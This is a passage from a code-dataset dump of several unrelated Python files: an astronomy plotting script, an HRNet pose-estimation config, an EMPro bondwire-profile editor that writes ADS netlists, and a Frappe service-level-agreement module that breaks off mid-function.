minlimit$)\")\r\n \r\n for n, texto in enumerate(name):\r\n #if any([True if item[0] == q1[n] and item[1] == mlim[n] else False for item in highlight]):\r\n if Nc[n] >= lim[\"Nc\"][0] and Nc[n] <= lim[\"Nc\"][1] and robust[n] <= lim[\"robust\"] \\\r\n and excluded[n] >= lim[\"excluded\"][0] and excluded[n] <= lim[\"excluded\"][1]:\r\n highl = plt.plot(robust[n], excluded[n], color=\"red\", marker=\"o\", markersize=7)\r\n plt.text(robust[n], excluded[n], texto, fontsize=8, fontweight='black', style='italic') \r\n highl[0].set_label(texto)\r\n \r\n plt.xlabel(\"Robustness\")\r\n plt.ylabel(\"Number of Excluded\")\r\n plt.legend(loc=0, numpoints=1, scatterpoints=1, fontsize=9)\r\n \r\n plt.show()\r\n plt.clf()\r\n \r\n \r\n\r\nif __name__ == \"__main__\":\r\n \r\n data_path = path.join(\"SDSSMOC\",\"lists\",\"MOC4_2quartile_refl.dat\")\r\n fit(data_path, [1.2,2.5,0.1],[0.05,0.4,0.05])\r\n #plot(tests=\"tests_mlim_moc2q.txt\", Nc=[20,50], excluded=[0, 700], robust=0.1)\r\n ","sub_path":"bestset.py","file_name":"bestset.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"112134249","text":"from yacs.config import CfgNode as CN\n\n\n_C = CN()\n\n_C.GPUS = (0,)\n_C.AUTO_RESUME = False\n\n# Cudnn related params\n_C.CUDNN = CN()\n
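# BENCHMARK lets cuDNN auto-tune convolution algorithms for fixed-size inputs, while\n# DETERMINISTIC trades that speed for reproducible results (standard PyTorch semantics).\n_C.CUDNN.BENCHMARK = 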
True\n_C.CUDNN.DETERMINISTIC = False\n_C.CUDNN.ENABLED = True\n\n# common params for NETWORK\n_C.MODEL = CN()\n_C.MODEL.NAME = 'pose_hrnet'\n_C.MODEL.PRETRAINED = ''\n_C.MODEL.NUM_JOINTS = 17\n_C.MODEL.TAG_PER_JOINT = True\n_C.MODEL.IMAGE_SIZE = [256, 256] # width * height, ex: 192 * 256\n_C.MODEL.HEATMAP_SIZE = [64, 64] # width * height, ex: 24 * 32\n_C.MODEL.SIGMA = 2\n\n_C.LOSS = CN()\n_C.LOSS.TOPK = 8\n_C.LOSS.USE_DIFFERENT_JOINTS_WEIGHT = False\n\n# DATASET related params\n_C.DATASET = CN()\n_C.DATASET.ROOT = ''\n_C.DATASET.COCO_BBOX_FILE = ''\n_C.DATASET.NAME = 'mpii'\n_C.DATASET.TRAIN_SET = 'train'\n_C.DATASET.TEST_SET = 'valid'\n_C.DATASET.DATA_FORMAT = 'jpg'\n_C.DATASET.SELECT_DATA = False\n\n# training data augmentation\n_C.DATASET.FLIP = True\n_C.DATASET.SCALE_FACTOR = 0.25\n_C.DATASET.ROT_FACTOR = 30\n_C.DATASET.PROB_HALF_BODY = 0.0\n_C.DATASET.NUM_JOINTS_HALF_BODY = 8\n\n# train\n_C.TRAIN = CN()\n\n_C.TRAIN.LR_FACTOR = 0.1\n_C.TRAIN.LR_STEP = [90, 110]\n_C.TRAIN.LR = 0.001\n\n\n_C.TRAIN.BEGIN_EPOCH = 0\n_C.TRAIN.END_EPOCH = 140\n\n_C.TRAIN.RESUME = False\n_C.TRAIN.CHECKPOINT = ''\n\n_C.TRAIN.BATCH_SIZE_PER_GPU = 32\n\n# testing\n_C.TEST = CN()\n\n# size of images for each device\n_C.TEST.BATCH_SIZE_PER_GPU = 32\n# Test Model Epoch\n_C.TEST.FLIP_TEST = False\n_C.TEST.POST_PROCESS = False\n_C.TEST.SHIFT_HEATMAP = False\n\n_C.TEST.USE_GT_BBOX = False\n\n# nms\n_C.TEST.BBOX_THRE = 1.0\n_C.TEST.MODEL_FILE = ''\n\n# debug\n_C.DEBUG = CN()\n_C.DEBUG.DEBUG = False\n_C.DEBUG.SAVE_BATCH_IMAGES_GT = False\n_C.DEBUG.SAVE_BATCH_IMAGES_PRED = False\n_C.DEBUG.SAVE_HEATMAPS_GT = False\n_C.DEBUG.SAVE_HEATMAPS_PRED = False\n\n\ndef update_config(cfg, args):\n cfg.defrost()\n cfg.merge_from_file(args.cfg)\n cfg.freeze()\n\n\nif __name__ == '__main__':\n import sys\n with open(sys.argv[1], 'w') as f:\n print(_C, file=f)\n\n","sub_path":"lib/config/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556177076","text":"# Copyright Keysight Technologies 2014 - 2017 \n#\n# This calls the EMPro bondwire profile editor to create or update an EBOND compatible bondwire shape for ADS. \n# The scripting capability of EMPro is used to serialize an EMPro bondwire definition and process it into\n# a form that the AEL component creation code for an ADS EBOND profile can handle.\n#\nimport empro\nimport sys\nimport os\nimport string\nimport math\nimport xml.dom.minidom\n\nebondShapeDefault_string = u'''\n\n\n \n \n \n \n \n
\n \n
\n \n
\n \n
\n \n
\n \n
\n
\n
\ntesttingtest\n
\\\n'''\n\nclass adsVarNetlistWriter:\n def __init__(self, fname=\"netlist.nlog\", shapename=\"JEDEC\", bonddef_string=ebondShapeDefault_string):\n self.file = open( fname, \"w\" )\n self.shapename = str(shapename)\n self.dom = xml.dom.minidom.parseString(bonddef_string)\n \n def getValue(self, itag='Radius', iNode=None):\n attr = 'value'\n elTag=None\n if iNode:\n elTag = iNode.getElementsByTagName(itag)\n else:\n elTag = self.dom.getElementsByTagName(itag)\n elFormula = elTag[0].getElementsByTagName('Formula')\n if elFormula[0].hasAttribute(attr):\n return elFormula[0].getAttribute(attr)\n \n def write(self):\n rw=self.getValue('Radius')\n rw=rw.strip()\n if rw[-2:]==' m':\n rw=rw.replace(' m', ' meter')\n\n numFaces = self.getValue('NumFaces')\n netlist = 'BWSHAPE|NAME=' + self.shapename + '|INSTANCE=Shape|MATERIAL=Gold|COND=4.1e7|RW=' + str(rw)\n netlist += '|ER=1.0|HEIGHT1=200 um|HEIGHT2=200 um|GNDHEIGHT=0 um|LENGTH=500 um|LAYER1=1|LAYER2=1|GNDLAYER=2|DRAWLAYER=6|VIEW=1'\n netlist += '|NUMFACES=' + str(numFaces) + '|ANNOTATELAYER=6|ANNOTATEHEIGHT=10'\n elVerts = self.dom.getElementsByTagName('Vertex')\n i=1\n for elVert in elVerts:\n tType = 'ST'\n tUnitClass = elVert.getAttribute('tUnitClass')\n dt = self.getValue('dt',elVert)\n dt = dt.strip()\n if tUnitClass=='LENGTH':\n tType = 'DL'\n if dt[-2:]==' m':\n dt = dt.replace(' m', ' meter') # m is behaving as 1.e-3 in ADS, meter is used instead\n elif tUnitClass=='ANGLE':\n tType = 'AT'\n # need to be degrees for ADS without unit\n if dt[-4:]==' deg':\n dt = dt.replace(' deg','')\n else:\n try:\n val = float(dt)\n dt = val*180.0/math.pi\n except:\n pass\n elif tUnitClass=='SCALAR':\n if dt[-3:]=='pct':\n dt = dt.replace('pct','') # pct is not a known unit in ADS\n val = float(dt) * .01\n dt = val\n \n tReference=elVert.getAttribute('tReference')[0]\n \n zType = 'ST'\n zUnitClass = elVert.getAttribute('zUnitClass')\n dz = self.getValue('dz',elVert)\n dz = dz.strip()\n if zUnitClass=='LENGTH':\n zType = 'DL'\n if dz[-2:]==' m':\n dz = dz.replace(' m', ' meter')\n elif zUnitClass=='ANGLE':\n zType = 'AT'\n # need to be degrees for ADS without unit\n if dz[-4:]==' deg':\n dz = dz.replace(' deg','')\n else:\n try:\n val = float(dz)\n dz = val * 180.0/math.pi\n except:\n pass\n elif zUnitClass=='SCALAR':\n if dz[-3:]=='pct':\n dz = dz.replace('pct','') # pct is not a known unit in ADS\n val = float(dz) * .01\n dz = val\n\n zReference = elVert.getAttribute('zReference')[0]\n netlist += '|PT='\n netlist += tReference + '=' + tType + '=' + str(dt)\n netlist += \"=\" + zReference + '=' + zType + '=' + str(dz)\n i += 1\n netlist += '|END'\n self.file.write(netlist)\n \n def close(self):\n self.file.close()\n\nbonddef_string=''\nshapeName=''\nif len(sys.argv)!=3:\n exit(1)\n \nshapename = sys.argv[1]\nfname = sys.argv[2]\nif os.path.isfile(fname):\n try:\n f=open(fname, 'r')\n bonddef_string = string.join(f.readlines())\n f.close()\n except:\n raise \nelse:\n bonddef_string = ebondShapeDefault_string.replace(\"JEDEC\", 'for ' + str(shapename))\n \nbonddef = empro.geometry.BondwireDefinition.deserialize(bonddef_string)\n\napp = empro.gui.BaseApp()\napp.init(sys.argv)\n\ndialog = empro.gui.SimpleDialog()\ndialog.windowTitle = \"Bondwire Profile Definition Editor\"\n\neditor = empro.gui.BondwireDefinitionEditor(bonddef, None)\ndialog.layout.add(editor)\n\naccepted = False\ndef onFinished(rc):\n global accepted\n accepted |= (rc == 1)\ndialog.onFinished = onFinished\n\ndialog.show(True)\n\nadsFname=fname + '.nlog'\nif accepted:\n bonddef_string = 
bonddef.serialize()\n try:\n f=open(fname, 'w')\n f.write(bonddef_string)\n f.close()\n netlistWriter = adsVarNetlistWriter(adsFname, shapename, bonddef_string)\n netlistWriter.write()\n netlistWriter.close()\n except:\n raise\n sys.exit(0)\n\nif os.path.isfile(adsFname):\n os.remove(adsFname)\nif os.path.isfile(fname):\n os.remove(fname)\nsys.exit(1)\n","sub_path":"uuu/ebond_edit_profile.py","file_name":"ebond_edit_profile.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"5570952","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2018, Frappe Technologies Pvt. Ltd. and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe import _\nfrom frappe.core.utils import get_parent_doc\nfrom frappe.utils import time_diff_in_seconds, getdate, get_weekdays, add_to_date, get_time, get_datetime, \\\n\tget_time_zone, to_timedelta, get_datetime_str, get_link_to_form, cint\nfrom datetime import datetime\nfrom verp.support.doctype.issue.issue import get_holidays\n\nclass ServiceLevelAgreement(Document):\n\tdef validate(self):\n\t\tself.validate_doc()\n\t\tself.validate_status_field()\n\t\tself.check_priorities()\n\t\tself.check_support_and_resolution()\n\n\tdef check_priorities(self):\n\t\tpriorities = []\n\n\t\tfor priority in self.priorities:\n\t\t\t# Check if response and resolution time is set for every priority\n\t\t\tif not priority.response_time:\n\t\t\t\tfrappe.throw(_(\"Set Response Time for Priority {0} in row {1}.\").format(priority.priority, priority.idx))\n\n\t\t\tif self.apply_sla_for_resolution:\n\t\t\t\tif not priority.resolution_time:\n\t\t\t\t\tfrappe.throw(_(\"Set Resolution Time for Priority {0} in row {1}.\").format(priority.priority, priority.idx))\n\n\t\t\t\tresponse = priority.response_time\n\t\t\t\tresolution = priority.resolution_time\n\t\t\t\tif response > resolution:\n\t\t\t\t\tfrappe.throw(_(\"Response Time for {0} priority in row {1} can't be greater than Resolution Time.\").format(priority.priority, priority.idx))\n\n\t\t\tpriorities.append(priority.priority)\n\n\t\t# Check for repeated priority\n\t\tif not len(set(priorities)) == len(priorities):\n\t\t\trepeated_priority = get_repeated(priorities)\n\t\t\tfrappe.throw(_(\"Priority {0} has been repeated.\").format(repeated_priority))\n\n\t\t# set default priority from priorities\n\t\ttry:\n\t\t\tself.default_priority = next(d.priority for d in self.priorities if d.default_priority)\n\t\texcept Exception:\n\t\t\tfrappe.throw(_(\"Select a Default Priority.\"))\n\n\tdef check_support_and_resolution(self):\n\t\tweek = get_weekdays()\n\t\tsupport_days = []\n\n\t\tfor support_and_resolution in self.support_and_resolution:\n\t\t\tsupport_days.append(support_and_resolution.workday)\n\t\t\tsupport_and_resolution.idx = week.index(support_and_resolution.workday) + 1\n\n\t\t\tif to_timedelta(support_and_resolution.start_time) >= to_timedelta(support_and_resolution.end_time):\n\t\t\t\tfrappe.throw(_(\"Start Time can't be greater than or equal to End Time for {0}.\").format(\n\t\t\t\t\tsupport_and_resolution.workday))\n\n\t\t# Check for repeated workday\n\t\tif not len(set(support_days)) == len(support_days):\n\t\t\trepeated_days = get_repeated(support_days)\n\t\t\tfrappe.throw(_(\"Workday {0} has been repeated.\").format(repeated_days))\n\n\tdef validate_doc(self):\n\t\t
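# \"Track Service Level Agreement\" must be switched on in Support Settings before an SLA\n\t\t# may target the Issue doctype; the check below raises a descriptive error otherwise.\n\t\tif self.enabled and self.document_type == \"Issue\" 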
\\\n\t\t\tand not frappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\t\t\tfrappe.throw(_(\"{0} is not enabled in {1}\").format(frappe.bold(\"Track Service Level Agreement\"),\n\t\t\t\tget_link_to_form(\"Support Settings\", \"Support Settings\")))\n\n\t\tif self.default_service_level_agreement and frappe.db.exists(\"Service Level Agreement\", {\n\t\t\t\"document_type\": self.document_type,\n\t\t\t\"default_service_level_agreement\": \"1\",\n\t\t\t\"name\": [\"!=\", self.name]\n\t\t}):\n\t\t\tfrappe.throw(_(\"Default Service Level Agreement for {0} already exists.\").format(self.document_type))\n\n\t\tif self.start_date and self.end_date:\n\t\t\tself.validate_from_to_dates(self.start_date, self.end_date)\n\n\t\tif self.entity_type and self.entity and frappe.db.exists(\"Service Level Agreement\", {\n\t\t\t\"entity_type\": self.entity_type,\n\t\t\t\"entity\": self.entity,\n\t\t\t\"name\": [\"!=\", self.name]\n\t\t}):\n\t\t\tfrappe.throw(_(\"Service Level Agreement for {0} {1} already exists.\").format(\n\t\t\t\tfrappe.bold(self.entity_type), frappe.bold(self.entity)))\n\n\tdef validate_status_field(self):\n\t\tmeta = frappe.get_meta(self.document_type)\n\t\tif not meta.get_field(\"status\"):\n\t\t\tfrappe.throw(_(\"The Document Type {0} must have a Status field to configure Service Level Agreement\").format(\n\t\t\t\tfrappe.bold(self.document_type)))\n\n\tdef get_service_level_agreement_priority(self, priority):\n\t\tpriority = frappe.get_doc(\"Service Level Priority\", {\"priority\": priority, \"parent\": self.name})\n\n\t\treturn frappe._dict({\n\t\t\t\"priority\": priority.priority,\n\t\t\t\"response_time\": priority.response_time,\n\t\t\t\"resolution_time\": priority.resolution_time\n\t\t})\n\n\tdef before_insert(self):\n\t\t# no need to set up SLA fields for Issue dt as they are standard fields in Issue\n\t\tif self.document_type == \"Issue\":\n\t\t\treturn\n\n\t\tservice_level_agreement_fields = get_service_level_agreement_fields()\n\t\tmeta = frappe.get_meta(self.document_type, cached=False)\n\n\t\tif meta.custom:\n\t\t\tself.create_docfields(meta, service_level_agreement_fields)\n\t\telse:\n\t\t\tself.create_custom_fields(meta, service_level_agreement_fields)\n\n\tdef on_trash(self):\n\t\tset_documents_with_active_service_level_agreement()\n\n\tdef after_insert(self):\n\t\tset_documents_with_active_service_level_agreement()\n\n\tdef on_update(self):\n\t\tset_documents_with_active_service_level_agreement()\n\n\tdef create_docfields(self, meta, service_level_agreement_fields):\n\t\tlast_index = len(meta.fields)\n\n\t\tfor field in service_level_agreement_fields:\n\t\t\tif not meta.has_field(field.get(\"fieldname\")):\n\t\t\t\tlast_index += 1\n\n\t\t\t\tfrappe.get_doc({\n\t\t\t\t\t\"doctype\": \"DocField\",\n\t\t\t\t\t\"idx\": last_index,\n\t\t\t\t\t\"parenttype\": \"DocType\",\n\t\t\t\t\t\"parentfield\": \"fields\",\n\t\t\t\t\t\"parent\": self.document_type,\n\t\t\t\t\t\"label\": field.get(\"label\"),\n\t\t\t\t\t\"fieldname\": field.get(\"fieldname\"),\n\t\t\t\t\t\"fieldtype\": field.get(\"fieldtype\"),\n\t\t\t\t\t\"collapsible\": field.get(\"collapsible\"),\n\t\t\t\t\t\"options\": field.get(\"options\"),\n\t\t\t\t\t\"read_only\": field.get(\"read_only\"),\n\t\t\t\t\t\"hidden\": field.get(\"hidden\"),\n\t\t\t\t\t\"description\": field.get(\"description\"),\n\t\t\t\t\t\"default\": field.get(\"default\"),\n\t\t\t\t}).insert(ignore_permissions=True)\n\t\t\telse:\n\t\t\t\texisting_field = 
meta.get_field(field.get(\"fieldname\"))\n\t\t\t\tself.reset_field_properties(existing_field, \"DocField\", field)\n\n\t\t# to update meta and modified timestamp\n\t\tfrappe.get_doc('DocType', self.document_type).save(ignore_permissions=True)\n\n\tdef create_custom_fields(self, meta, service_level_agreement_fields):\n\t\tfor field in service_level_agreement_fields:\n\t\t\tif not meta.has_field(field.get(\"fieldname\")):\n\t\t\t\tfrappe.get_doc({\n\t\t\t\t\t\"doctype\": \"Custom Field\",\n\t\t\t\t\t\"dt\": self.document_type,\n\t\t\t\t\t\"label\": field.get(\"label\"),\n\t\t\t\t\t\"fieldname\": field.get(\"fieldname\"),\n\t\t\t\t\t\"fieldtype\": field.get(\"fieldtype\"),\n\t\t\t\t\t\"insert_after\": \"append\",\n\t\t\t\t\t\"collapsible\": field.get(\"collapsible\"),\n\t\t\t\t\t\"options\": field.get(\"options\"),\n\t\t\t\t\t\"read_only\": field.get(\"read_only\"),\n\t\t\t\t\t\"hidden\": field.get(\"hidden\"),\n\t\t\t\t\t\"description\": field.get(\"description\"),\n\t\t\t\t\t\"default\": field.get(\"default\"),\n\t\t\t\t}).insert(ignore_permissions=True)\n\t\t\telse:\n\t\t\t\texisting_field = meta.get_field(field.get(\"fieldname\"))\n\t\t\t\tself.reset_field_properties(existing_field, \"Custom Field\", field)\n\n\tdef reset_field_properties(self, field, field_dt, sla_field):\n\t\tfield = frappe.get_doc(field_dt, {\"fieldname\": field.fieldname})\n\t\tfield.label = sla_field.get(\"label\")\n\t\tfield.fieldname = sla_field.get(\"fieldname\")\n\t\tfield.fieldtype = sla_field.get(\"fieldtype\")\n\t\tfield.collapsible = sla_field.get(\"collapsible\")\n\t\tfield.hidden = sla_field.get(\"hidden\")\n\t\tfield.options = sla_field.get(\"options\")\n\t\tfield.read_only = sla_field.get(\"read_only\")\n\t\tfield.hidden = sla_field.get(\"hidden\")\n\t\tfield.description = sla_field.get(\"description\")\n\t\tfield.default = sla_field.get(\"default\")\n\t\tfield.save(ignore_permissions=True)\n\n\ndef check_agreement_status():\n\tservice_level_agreements = frappe.get_all(\"Service Level Agreement\", filters=[\n\t\t{\"enabled\": 1},\n\t\t{\"default_service_level_agreement\": 0}\n\t], fields=[\"name\"])\n\n\tfor service_level_agreement in service_level_agreements:\n\t\tdoc = frappe.get_doc(\"Service Level Agreement\", service_level_agreement.name)\n\t\tif doc.end_date and getdate(doc.end_date) < getdate(frappe.utils.getdate()):\n\t\t\tfrappe.db.set_value(\"Service Level Agreement\", service_level_agreement.name, \"enabled\", 0)\n\n\ndef get_active_service_level_agreement_for(doctype, priority, customer=None, service_level_agreement=None):\n\tif doctype == \"Issue\" and not frappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\t\treturn\n\n\tfilters = [\n\t\t[\"Service Level Agreement\", \"document_type\", \"=\", doctype],\n\t\t[\"Service Level Agreement\", \"enabled\", \"=\", 1]\n\t]\n\tif priority:\n\t\tfilters.append([\"Service Level Priority\", \"priority\", \"=\", priority])\n\n\tor_filters = []\n\tif service_level_agreement:\n\t\tor_filters = [\n\t\t\t[\"Service Level Agreement\", \"name\", \"=\", service_level_agreement],\n\t\t]\n\n\tif customer:\n\t\tor_filters.append(\n\t\t\t[\"Service Level Agreement\", \"entity\", \"in\", [customer, get_customer_group(customer), get_customer_territory(customer)]]\n\t\t)\n\tor_filters.append([\"Service Level Agreement\", \"default_service_level_agreement\", \"=\", 1])\n\n\tagreement = frappe.get_all(\"Service Level Agreement\", filters=filters, or_filters=or_filters,\n\t\tfields=[\"name\", \"default_priority\", 
\"apply_sla_for_resolution\"])\n\n\treturn agreement[0] if agreement else None\n\n\ndef get_customer_group(customer):\n\treturn frappe.db.get_value(\"Customer\", customer, \"customer_group\") if customer else None\n\n\ndef get_customer_territory(customer):\n\treturn frappe.db.get_value(\"Customer\", customer, \"territory\") if customer else None\n\n\n@frappe.whitelist()\ndef get_service_level_agreement_filters(doctype, name, customer=None):\n\tif not frappe.db.get_single_value(\"Support Settings\", \"track_service_level_agreement\"):\n\t\treturn\n\n\tfilters = [\n\t\t[\"Service Level Agreement\", \"document_type\", \"=\", doctype],\n\t\t[\"Service Level Agreement\", \"enabled\", \"=\", 1]\n\t]\n\n\tor_filters = [\n\t\t[\"Service Level Agreement\", \"default_service_level_agreement\", \"=\", 1]\n\t]\n\n\tif customer:\n\t\t# Include SLA with No Entity and Entity Type\n\t\tor_filters.append(\n\t\t\t[\"Service Level Agreement\", \"entity\", \"in\", [customer, get_customer_group(customer), get_customer_territory(customer), \"\"]]\n\t\t)\n\n\treturn {\n\t\t\"priority\": [priority.priority for priority in frappe.get_all(\"Service Level Priority\", filters={\"parent\": name}, fields=[\"priority\"])],\n\t\t\"service_level_agreements\": [d.name for d in frappe.get_all(\"Service Level Agreement\", filters=filters, or_filters=or_filters)]\n\t}\n\n\ndef get_repeated(values):\n\tunique_list = []\n\tdiff = []\n\tfor value in values:\n\t\tif value not in unique_list:\n\t\t\tunique_list.append(str(value))\n\t\telse:\n\t\t\tif value not in diff:\n\t\t\t\tdiff.append(str(value))\n\treturn \" \".join(diff)\n\n\ndef get_documents_with_active_service_level_agreement():\n\tif not frappe.cache().hget(\"service_level_agreement\", \"active\"):\n\t\tset_documents_with_active_service_level_agreement()\n\n\treturn frappe.cache().hget(\"service_level_agreement\", \"active\")\n\n\ndef set_documents_with_active_service_level_agreement():\n\tactive = [sla.document_type for sla in frappe.get_all(\"Service Level Agreement\", fields=[\"document_type\"])]\n\tfrappe.cache().hset(\"service_level_agreement\", \"active\", active)\n\n\ndef apply(doc, method=None):\n\t# Applies SLA to document on validate\n\tif frappe.flags.in_patch or frappe.flags.in_install or frappe.flags.in_setup_wizard or \\\n\t\tdoc.doctype not in get_documents_with_active_service_level_agreement():\n\t\treturn\n\n\tservice_level_agreement = get_active_service_level_agreement_for(doctype=doc.get(\"doctype\"), priority=doc.get(\"priority\"),\n\t\tcustomer=doc.get(\"customer\"), service_level_agreement=doc.get(\"service_level_agreement\"))\n\n\tif not service_level_agreement:\n\t\treturn\n\n\tset_sla_properties(doc, service_level_agreement)\n\n\ndef set_sla_properties(doc, service_level_agreement):\n\tif frappe.db.exists(doc.doctype, doc.name):\n\t\tfrom_db = frappe.get_doc(doc.doctype, doc.name)\n\telse:\n\t\tfrom_db = frappe._dict({})\n\n\tmeta = frappe.get_meta(doc.doctype)\n\n\tif meta.has_field(\"customer\") and service_level_agreement.customer and doc.get(\"customer\") and \\\n\t\tnot service_level_agreement.customer == doc.get(\"customer\"):\n\t\tfrappe.throw(_(\"Service Level Agreement {0} is specific to Customer {1}\").format(service_level_agreement.name,\n\t\t\tservice_level_agreement.customer))\n\n\tdoc.service_level_agreement = service_level_agreement.name\n\tdoc.priority = doc.get(\"priority\") or service_level_agreement.default_priority\n\tpriority = get_priority(doc)\n\n\tif not doc.creation:\n\t\tdoc.creation = 
now_datetime(doc.get(\"owner\"))\n\n\t\tif meta.has_field(\"service_level_agreement_creation\"):\n\t\t\tdoc.service_level_agreement_creation = now_datetime(doc.get(\"owner\"))\n\n\tstart_date_time = get_datetime(doc.get(\"service_level_agreement_creation\") or doc.creation)\n\n\tset_response_by_and_variance(doc, meta, start_date_time, priority)\n\tif service_level_agreement.apply_sla_for_resolution:\n\t\tset_resolution_by_and_variance(doc, meta, start_date_time, priority)\n\n\tupdate_status(doc, from_db, meta)\n\n\ndef update_status(doc, from_db, meta):\n\tif meta.has_field(\"status\"):\n\t\tif meta.has_field(\"first_responded_on\") and doc.status != \"Open\" and \\\n\t\t\tfrom_db.status == \"Open\" and not doc.first_responded_on:\n\t\t\tdoc.first_responded_on = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\n\t\tif meta.has_field(\"service_level_agreement\") and doc.service_level_agreement:\n\t\t\t# mark sla status as fulfilled based on the configuration\n\t\t\tfulfillment_statuses = [entry.status for entry in frappe.db.get_all(\"SLA Fulfilled On Status\", filters={\n\t\t\t\t\"parent\": doc.service_level_agreement\n\t\t\t}, fields=[\"status\"])]\n\n\t\t\tif doc.status in fulfillment_statuses and from_db.status not in fulfillment_statuses:\n\t\t\t\tapply_sla_for_resolution = frappe.db.get_value(\"Service Level Agreement\", doc.service_level_agreement,\n\t\t\t\t\t\"apply_sla_for_resolution\")\n\n\t\t\t\tif apply_sla_for_resolution and meta.has_field(\"resolution_date\"):\n\t\t\t\t\tdoc.resolution_date = frappe.flags.current_time or now_datetime(doc.get(\"owner\"))\n\n\t\t\t\tif meta.has_field(\"agreement_status\") and from_db.agreement_status == \"Ongoing\":\n\t\t\t\t\tset_service_level_agreement_variance(doc.doctype, doc.name)\n\t\t\t\t\tupdate_agreement_status(doc, meta)\n\n\t\t\t\tif apply_sla_for_resolution:\n\t\t\t\t\tset_resolution_time(doc, meta)\n\t\t\t\t\tset_user_resolution_time(doc, meta)\n\n\t\tif doc.status == \"Open\" and from_db.status != \"Open\":\n\t\t\t# if no date, it should be set as None and not a blank string \"\", as per mysql strict config\n\t\t\t# enable SLA and variance on Reopen\n\t\t\treset_metrics(doc, meta)\n\t\t\tset_service_level_agreement_variance(doc.doctype, doc.name)\n\n\thandle_hold_time(doc, meta, from_db.status)\n\n\ndef get_expected_time_for(parameter, service_level, start_date_time):\n\tcurrent_date_time = start_date_time\n\texpected_time = current_date_time\n\tstart_time = end_time = None\n\texpected_time_is_set = 0\n\n\tallotted_seconds = get_allotted_seconds(parameter, service_level)\n\tsupport_days = get_support_days(service_level)\n\tholidays = get_holidays(service_level.get(\"holiday_list\"))\n\tweekdays = get_weekdays()\n\n\twhile not expected_time_is_set:\n\t\tcurrent_weekday = weekdays[current_date_time.weekday()]\n\n\t\tif not is_holiday(current_date_time, holidays) and current_weekday in support_days:\n\t\t\tif getdate(current_date_time) == getdate(start_date_time) \\\n\t\t\t\tand get_time_in_timedelta(current_date_time.time()) > support_days[current_weekday].start_time:\n\t\t\t\tstart_time = current_date_time - datetime(current_date_time.year, current_date_time.month, current_date_time.day)\n\t\t\telse:\n\t\t\t\tstart_time = support_days[current_weekday].start_time\n\n\t\t\tend_time = support_days[current_weekday].end_time\n\t\t\ttime_left_today = time_diff_in_seconds(end_time, start_time)\n\t\t\t# no time left for support today\n\t\t\tif time_left_today <= 0:\n\t\t\t\tpass\n\n\t\t\telif allotted_seconds:\n\t\t\t\tif 
time_left_today >= allotted_seconds:\n\t\t\t\t\texpected_time = datetime.combine(getdate(current_date_time), get_time(start_time))\n\t\t\t\t\texpected_time = add_to_date(expected_time, seconds=allotted_seconds)\n\t\t\t\t\texpected_time_is_set = 1\n\t\t\t\telse:\n\t\t\t\t\tallotted_seconds = allotted_seconds - time_left_today\n\n\t\tif not expected_time_is_set:\n\t\t\tcurrent_date_time = add_to_date(current_date_time, days=1)\n\n\tif end_time and allotted_seconds >= 86400:\n\t\tcurrent_date_time = datetime.combine(getdate(current_date_time), get_time(end_time))\n\telse:\n\t\tcurrent_date_time = expected_time\n\n\treturn current_date_time\n\n\ndef get_allotted_seconds(parameter, service_level):\n\tallotted_seconds = 0\n\tif parameter == \"response\":\n\t\tallotted_seconds = service_level.get(\"response_time\")\n\telif parameter == \"resolution\":\n\t\tallotted_seconds = service_level.get(\"resolution_time\")\n\telse:\n\t\tfrappe.throw(_(\"{0} parameter is invalid\").format(parameter))\n\n\treturn allotted_seconds\n\n\ndef get_support_days(service_level):\n\tsupport_days = {}\n\tfor service in service_level.get(\"support_and_resolution\"):\n\t\tsupport_days[service.workday] = frappe._dict({\n\t\t\t\"start_time\": service.start_time,\n\t\t\t\"end_time\": service.end_time,\n\t\t})\n\treturn support_days\n\n\ndef set_service_level_agreement_variance(doctype, doc=None):\n\n\tfilters = {\"status\": \"Open\", \"agreement_status\": \"Ongoing\"}\n\n\tif doc:\n\t\tfilters = {\"name\": doc}\n\n\tfor entry in frappe.get_all(doctype, filters=filters):\n\t\tcurrent_doc = frappe.get_doc(doctype, entry.name)\n\t\tcurrent_time = frappe.flags.current_time or now_datetime(current_doc.get(\"owner\"))\n\t\tapply_sla_for_resolution = frappe.db.get_value(\"Service Level Agreement\", current_doc.service_level_agreement,\n\t\t\t\"apply_sla_for_resolution\")\n\n\t\tif not current_doc.first_responded_on: # first_responded_on set when first reply is sent to customer\n\t\t\tvariance = round(time_diff_in_seconds(current_doc.response_by, current_time), 2)\n\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"response_by_variance\", variance, update_modified=False)\n\n\t\t\tif variance < 0:\n\t\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"agreement_status\", \"Failed\", update_modified=False)\n\n\t\tif apply_sla_for_resolution and not current_doc.get(\"resolution_date\"): # resolution_date set when issue has been closed\n\t\t\tvariance = round(time_diff_in_seconds(current_doc.resolution_by, current_time), 2)\n\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"resolution_by_variance\", variance, update_modified=False)\n\n\t\t\tif variance < 0:\n\t\t\t\tfrappe.db.set_value(current_doc.doctype, current_doc.name, \"agreement_status\", \"Failed\", update_modified=False)\n\n\ndef set_user_resolution_time(doc, meta):\n\t# total time taken by a user to close the issue apart from wait_time\n\tif not meta.has_field(\"user_resolution_time\"):\n\t\treturn\n\n\tcommunications = frappe.get_all(\"Communication\", filters={\n\t\t\t\"reference_doctype\": doc.doctype,\n\t\t\t\"reference_name\": doc.name\n\t\t}, fields=[\"sent_or_received\", \"name\", \"creation\"], order_by=\"creation\")\n\n\tpending_time = []\n\t# start at index 1 so communications[i-1] is always the chronologically previous entry\n\t# (range(len(...)) would wrap i-1 around to the last element on the first iteration)\n\tfor i in range(1, len(communications)):\n\t\tif communications[i].sent_or_received == \"Received\" and communications[i-1].sent_or_received == \"Sent\":\n\t\t\twait_time = 